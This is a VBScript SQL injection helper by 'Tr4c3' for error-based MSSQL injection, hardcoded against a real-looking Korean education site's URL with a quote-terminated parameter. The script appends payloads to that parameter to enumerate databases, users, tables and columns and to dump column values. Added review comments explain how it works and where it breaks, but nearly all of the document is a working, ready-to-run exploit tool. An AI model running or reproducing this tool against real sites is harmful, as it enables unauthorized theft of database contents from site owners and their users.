Sql2005注射辅助脚本[粗糙版]
来源:鬼仔
作者:Tr4c3
'***********************************************************************************************
'Sql2005 injection helper script [rough version], for MSSQL error-display mode By Tr4c3[at]126[Dot]com
'Also usable against MSSQL 2000, although for 2000 nbsi and Pangolin are still the usual choice.
'***********************************************************************************************
'To keep the script general, the and (select col_name(object_id('TableName'),N))=0 form is not used.
'To return Korean and similar characters, change line 121 or 136; other settings have to be edited by hand.
'Further features are left for readers to add.
'
' Review notes (what the code below actually does, for anyone assessing or detecting it):
'  - Every request is the page's own query string (strArg) with " and quotename(...)=0--"
'    appended (the strData assignments). GET puts it unencoded in the URL; POST sends it as a
'    form body in which UrlEncode only turns spaces into "+". Both set Referer to strUrl.
'  - SqlInj counts a response as a hit only when it contains both "'[" and "]'" and prints
'    the text between them; otherwise the global strD becomes "" and the calling Do loop stops.
'    A server that does not echo its database error text to the client therefore yields
'    nothing to this script; the "error-display mode" remark in the header is that dependency.
'  - There is no Option Explicit: Args, strData, strRevS, objXML, fso, fso1, Database, Table,
'    col, TarGet, TarGetCol, strReturn, ThisCharCode and NextCharCode are implicit globals.
'  - VBScript's And does not short-circuit, so with exactly one argument that is neither
'    "databases" nor "info" the Args(1) read in the "tables" test below fails with a
'    subscript error instead of printing usage; any other unmatched argument set exits silently.

Const method = "Get" 'request method; Get or Post
Const DisPlay = "D" 'S = append to a file, D = print to the screen

Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD

' The full URL is split at "?" into the base URL (element 0) and the query string (element 1).
strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" 'the injection point varies, so this is edited by hand
i = 1 'database index base (db_name(i) probes start at 1)
k = 0 'table and column index base (number of names already seen, used in the "top k" sub-selects)
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) 'url part
strArg = MyArray(1) 'query-string part (MyArray(1) does not exist if strUrl_B has no "?")
Set Args = Wscript.Arguments

' No arguments: print usage. ShowU ends with .Quit, so nothing below runs in that case.
If Args.Count = 0 Then
    ShowU
End If
'If Args.Count =1 And LCase(Args(0))

'************************************************************************
' enumerate databases
'************************************************************************
' "databases": probe db_name(1), db_name(2), ... until a probe yields no bracketed value.
' "info": three single probes: db_name(), user and System_user.
If Args.Count =1 Then
    If LCase(Trim(Args(0)))="databases" Then
        ResuT("---------------===============================--------------")
        ResuT("All The DataBases:")

        Do
            strData = " and quotename(db_name("&i&"))=0--"
            sqlInj(strData)
            i = i + 1
        Loop Until StrD=""
        ResuT("---------------===============================--------------")
        Wscript.Quit
    ElseIf LCase(Trim(Args(0)))= "info" then
        ResuT("---------------===============================--------------")
        ResuT("The Current Database is:")
        strData = " and quotename(db_name())=0--"
        sqlInj(strData)
        ResuT("---------------===============================--------------")
        ResuT("The database User is:")
        strData = " and quotename(user)=0--"
        sqlInj(strData)
        ResuT("---------------===============================--------------")
        ResuT("The System_user is:")
        strData = " and quotename(System_user)=0--"
        sqlInj(strData)
        ResuT("---------------===============================--------------")
        Wscript.Quit
    End If
End If
'************************************************************************
' enumerate tables
'************************************************************************
' Args(0) is a database name. One row of <db>.dbo.sysobjects with xtype=char(85) ('U')
' is read per request, skipping the first k names each time, until a probe yields nothing.
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
    ResuT("---------------===============================--------------")
    ResuT("The Tables Of " & Args(0))
    Do
        strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
        sqlInj(strData)
        k = k + 1
    Loop Until StrD=""
    ResuT("---------------===============================--------------")
    Wscript.Quit
End If

'************************************************************************
' enumerate columns
'************************************************************************
' Args(0) is a database, Args(1) a table. Column names come from <db>.DBO.SYSCOLUMNS
' filtered by object_id of <db>.dbo.<table>, one per request with the same skip-k pattern.
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
    Database = Args(0)
    Table = Args(1)
    TarGet = DataBase & ".dbo." & Table
    TarGetCol = Database & ".DBO.SYSCOLUMNS"
    ResuT("---------------===============================--------------")
    ResuT("The Columns Of " & TarGet)
    Do
        strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
        sqlInj(strData)
        k = k + 1
    Loop Until StrD=""
    ResuT("---------------===============================--------------")
    Wscript.Quit
End If

'************************************************************************
' dump column values
'************************************************************************
' Args(0) database, Args(1) table, Args(2) column. Each request returns one value of the
' column that is not among the values of the first k rows, until a probe yields nothing.
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
    Database = Args(0)
    Table = Args(1)
    col = Args(2)
    Target = Database & ".dbo." & Table 
    ResuT("---------------===============================--------------")
    ResuT("The Values Of " & Args(2) & " in "&Target)
    Do
        strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
        sqlInj(strData)
        k = k + 1
    Loop Until StrD=""
    ResuT("---------------===============================--------------")
    Wscript.Quit
End If

' Sends one probe (value appended to strArg) with the configured method and sets the global
' strD to the text found between "'[" and "]'" in the response, or to "" when either delimiter
' is absent; a hit is also printed via ResuT. If method is neither GET nor POST, strD is left
' as it was. value is reassigned here, but the callers write sqlInj(strData) with parentheses,
' which passes the argument by value in VBScript, so strData itself is not altered.
' The GET and POST branches differ only in transport; the response parsing is duplicated.
Sub SqlInj(value)
    If UCase(method) = "GET" Then
        value = strArg & value
        Set objXML = CreateObject("Microsoft.XMLHTTP")
        objXML.Open "GET", strUrl &"?" & value , False 'synchronous; value is not URL-encoded
        objXML.SetRequestHeader "Referer", strUrl
        'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
        objXML.send()
        strRevS = objXML.ResponseText 'default
        'strRevS = bytes2BSTR(objXML.ResponseBody) 'sometimes needed for Korean text
        ' Mid takes what lies between the first "'[" and the first "]'"; the delimiters match
        ' a quotename()-bracketed value quoted inside the server's error text.
        If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
            strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
            ResuT(" |_"&strD)
        Else
            strD = ""
        End If
    ElseIf UCase(method) = "POST" Then
        value = strArg & value
        Set objXML = CreateObject("Microsoft.XMLHTTP")
        objXML.Open "POST", strUrl, False 'synchronous
        objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
        objXML.SetRequestHeader "Referer", strUrl
        objXML.send(UrlEncode(value)) 'UrlEncode only replaces spaces
        strRevS = objXML.ResponseText 'default
        'strRevS = bytes2BSTR(objXML.ResponseBody) 'sometimes needed for Korean text
        ' Same delimiter parsing as the GET branch.
        If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
            strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
            ResuT(" |_"&strD)
        Else
            strD = ""
        End If
    End If
End Sub

' Emits one output line according to DisPlay: "S" appends it to result.txt in the current
' directory (OpenTextFile mode 8 = ForAppending, create if missing); "D" echoes it to the
' console. Any other DisPlay value drops the line silently. Declared as a Function but never
' assigns a return value; fso1 is closed but not released with Set ... = Nothing.
Function ResuT(strInfo)
    If UCase(DisPlay) = "S" Then
        Set fso = CreateObject("Scripting.FileSystemObject")
        Set fso1 = fso.OpenTextFile("result.txt",8,True)
        fso1.WriteLine(strInfo)
        fso1.Close
        Set fso = Nothing
    ElseIf UCase(DisPlay) = "D" Then
        Wscript.Echo(strInfo)
    End If
End Function

' Not a general URL encoder: it only replaces spaces with "+". Used for the POST body only.
Function UrlEncode(str)
    str = Replace(str," ","+")
    UrlEncode = str
End Function

' Converts a byte array to a string: bytes below &H80 become one character each; a higher
' byte is combined with the following byte into a single two-byte character code.
' Only referenced from the commented-out ResponseBody lines in SqlInj.
' NOTE(review): the loop counter is the script-level i from the Dim at the top (no local
' Dim here), so enabling this call would clobber the "databases" counter; and when the
' last byte is >= &H80 the MidB(vIn,i+1,1) read attempts to go past the end of vIn.
Function bytes2BSTR(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn,i,1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn,i+1,1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1 'consume the second byte of the pair
        End If
    Next
    bytes2BSTR = strReturn
End Function

' Prints the usage text (the echoed strings are runtime output and are left as written)
' and ends the script with .Quit.
Sub showU()
    With Wscript
        .Echo("+--------------------------=====================------------------------------+")
        .Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com")
        .Echo("Usage:")
        .Echo(" cscript"&.ScriptName&" info--爆基本信息")
        .Echo(" cscript"&.ScriptName&" databases--爆所有库名")
        .Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
        .Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
        .Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
        .Echo("+--------------------------=====================------------------------------+")
        .Quit
    End with
End Sub
